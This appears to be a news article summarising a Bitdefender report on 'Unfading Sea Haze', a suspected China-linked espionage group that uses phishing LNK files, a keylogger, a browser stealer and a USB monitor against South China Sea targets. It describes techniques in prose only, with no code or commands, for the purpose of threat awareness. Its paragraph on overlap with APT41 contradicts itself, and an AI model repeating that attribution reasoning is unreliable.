A previously unidentified cyber threat actor, suspected of having ties to China, has been targeting military and government organizations in the South China Sea region since 2018, according to a report released by Romanian cybersecurity company, Bitdefender. This new group, identified as Unfading Sea Haze, is believed to be operating independently from other known Chinese threat actors such as APT41.
While Unfading Sea Haze does not appear to share any of the same tools or techniques with APT41, the report noted that “no other overlaps with APT41’s known tools were identified,” suggesting a potential link through shared coding practices within the Chinese cyber threat scene. This single similarity could be another indication of commonalities between these two groups.
Since 2018, Unfading Sea Haze has targeted at least eight victims, primarily focusing on military and government targets in the region. The group is known for repeatedly regaining access to compromised systems.
One method used by the threat actors to infiltrate target systems involves sending spear-phishing emails containing malicious ZIP archives. These archives contain LNK files disguised as regular documents. When clicked, these LNK files execute malicious commands, allowing the attackers to gain initial access to their targets.
Some of the ZIP archive names used by the group include “Data,” “Doc,” and “Startechup_fINAL.” In March 2024, Unfading Sea Haze started using new ZIP archive names such as “Assange_Labeled_an_‘Enemy’_of_the_US_in_Secret_Pentagon_Documents102” and “Presidency of Barack Obama.” Other misleading ZIPs were named as installers, updaters, or documents of Microsoft Windows Defender.
Once the attackers have gained access to their targets’ systems, they use a combination of custom and off-the-shelf tools to collect data. One such custom tool is a keylogger named “xkeylog,” which captures keystrokes on victim machines. Another custom tool is a browser data sealer that targets information stored in browsers like Google Chrome, Firefox, Microsoft Edge, or Internet Explorer.
A third custom tool allows Unfading Sea Haze to monitor the presence of portable devices on compromised systems. The tool checks for WPD or USB every 10 seconds. If a device is mounted, it gathers details about the device and sends them using HTTP GET request to an attacker-controlled server,” the report explains.
Additionally, Unfading Sea Haze collects data from messaging apps including Telegram and Viber. The group also uses the RAR compression tool manually for collecting data. This blend of custom and off-the-shelf tools, along with manual data extraction, paints a picture of a targeted espionage campaign focused on acquiring sensitive information from compromised systems,” the report reads.
The threat group managed to operate undetected for over five years, which is particularly concerning. The attackers demonstrated a sophisticated approach to cyberattacks and evasion techniques that have allowed them to remain under the radar for so long.
Bitdefender researchers have made their findings public in hopes of helping the security community detect and disrupt these espionage efforts by Unfading Sea Haze and other similar threat actors. The report concludes with some recommendations on how to mitigate risks posed by this group, including prioritizing patch management, enforcing strong password policies, monitoring network traffic, and collaborating with the cybersecurity community.